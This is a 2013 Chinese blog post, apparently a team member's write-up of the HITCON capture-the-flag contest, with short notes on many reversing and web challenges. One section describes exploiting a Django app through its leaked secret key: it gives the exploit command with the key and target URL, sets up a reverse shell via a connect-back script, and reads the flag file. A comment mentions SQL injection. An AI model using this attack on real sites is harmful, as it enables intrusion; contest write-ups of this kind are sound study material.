Saturday, July 20, 2013

HIT2013 解題心得


今年因為一些緣故,所以無法到會場參加每年安全最大的盛會 hitcon

雖然一開始搶票的時候沒弄到,連幹了活X通幾聲

然而,幸運的在今年 PyCON 2013 中午看到 @crboy 小畢發噗,說也來寫個哀怨的對聯好了XDD




創意對聯
Cyberwar: in hack, we trust
Ticketwar: at midnight, the site crashed
橫批:Distributed Denial of Service


沒想到... 就拿到票惹XD




不過後來還是沒去啦... QQ

Anyway, 來寫心得文吧!XD

今年題目設計和以往又有些不同,多了很多  AppleScript/Obj-C 的 hacking, PE / .NET 逆向題目也不錯,.apk 也許也該來碰了...XD

各題首次破台者 

媽我在這~~~._./



最終盤面


心得與思路分享




R100 這題看了半天看不出所以然 QQ






AppleScript ... WTF

run-only 屬性去不掉,GG




一樣是沒碰過的 apk 題... 該來研究了 (?)




apk 兩題




這題很有趣,首先要寫兩個 script 把 RAR 解開 100 層,接著,要把剩下來解開 RAR 的檔名"拼" 成一個 binary file... Orz






稍作整理然後轉成 binary

echo -n -e $(tr -d '[:space:]' | sed 's/../\\x&/g')

$ file new.bin
new.bin: PE32 executable for MS Windows (console) Intel 80386 32-bit




這個東西拿到 VM 底下就一隻該死的南瓜... Orz (而且還會唱歌www)


而且還需要用 upx 去個殼...

strings 結果:


字串都不是 key

IDA 看了很久也沒有想法,丟給隊友作,後來據說是解神奇的數學 (?


解!







這題乍看之下要分析 JavaScript (小弟苦手...

而且還是 aaencode ゚ω゚ノ= /`m´)ノ ~┻━┻

不過... 其實秘訣就... 讓那段 code 動起來XDD
chrome console 下,var foo = function {......}
foo();

就拿到 key 啦!還會有動畫XDDDD


解!






Web 苦手,pass 給隊友 Orz

社交工程 pf ㄉㄉ也可以拿到 key




Pass, 不過聽說不難




Pass




Pass, CrBoy / rsghost / JokerCatz 解開惹 0w0







這題其實www

乍看之下 py2exe 要反解... 不過就...

unzip + vim 搞定XD






丟 IDA 看... 沒想法QQ







Obj-C ... Orz

中間一排 AAA 很可疑就是...






再一題 Obj-C ... WTF






找到了諸多疑點,可是沒弄出來QQ

strings 出來的解和這邊一樣...

http://stuff.mit.edu/afs/sipb/project/hurddev/tb/libc/locale/C-identification.c

http://svn.haiku-os.org/oldhaiku/haiku/branches/old/wcsmbs/current/src/kernel/libroot/posix/glibc/wcsmbs/wcsmbsload.c

Pass 給隊友



TW1943 做了逆向, CrBoy 他們解出了一個 C# 的 twitter bot ... 可是沒猜出來







這個也殘念,exploit pdf 先丟反解把 pdf decode 成明碼

用和這邊 類似的作法,可是沒找到可疑的 JavaScript ...



Pass



隊友 TW1943 完成
rar fix
nul.Ly
crack md5
Philippines






往年的尋常水題

hack the planet!




沒 PWN 出來QQ



windows ... 哭哭




也沒碰...





得意解!!!!!



PyCON.tw 2013 時,Orange 在 "駭客看 Django" 的議程上特別說過,Secret key 很重要,可以用來偽造 Cookie 達成許多不可思議的事情


Google 找攻略,這邊有詳細介紹這類的攻擊方式

首先 clone 這個 repo 下來

connback.py 改成自己的機器,做反彈 shell

然後

./exploit.py "1%idg#a2%byqh@l1wcv^3kc=e*($0v44(u-c^@bf_lz-@#essk" http://vuln-django.orange.tw


到處看看

# cat ./app/key.txt

got!


關主 Orange 很得意的發噗說希望等人來解

看到後底下回個 QQ  ... 

沒想到 12 分鐘後就 done 了XDDDD





解完這題很開心,一度名次還沒前面的說QQ

我解完 PWN500 後自己測試帳號是第四名XDD

而且站在 CRAX 的前面!!!



歷史一瞬間!(圖片提供:rsg)





Anyway, 感謝各位隊友的幫助

BlueT
Divazone
JokerCatz
Mr. Q
rsggggggggggg
Shun-Yun Hu
TW1943
CrBoy


<(_ _)>


今年似乎魏藥也是有事情無法前來,可惜了...QQ

玩得很開心最重要,名次就... 不重要吧XD

另外恭喜 SQlab 的 CRAX 和 DSNS lab 都拿了不錯的成績

HackStuff 的朋友們也表現很亮眼




大家加油!明年再接再厲!

xatier @hitcon2013



5 comments:

  1. web 300
    favorit -> favicon.ico
    hint1 時就解了
    ico中有captcha
    帳號處有sqli
    但是admin/admin就進去了 XDD

    ReplyDelete
  2. This comment has been removed by the author.

    ReplyDelete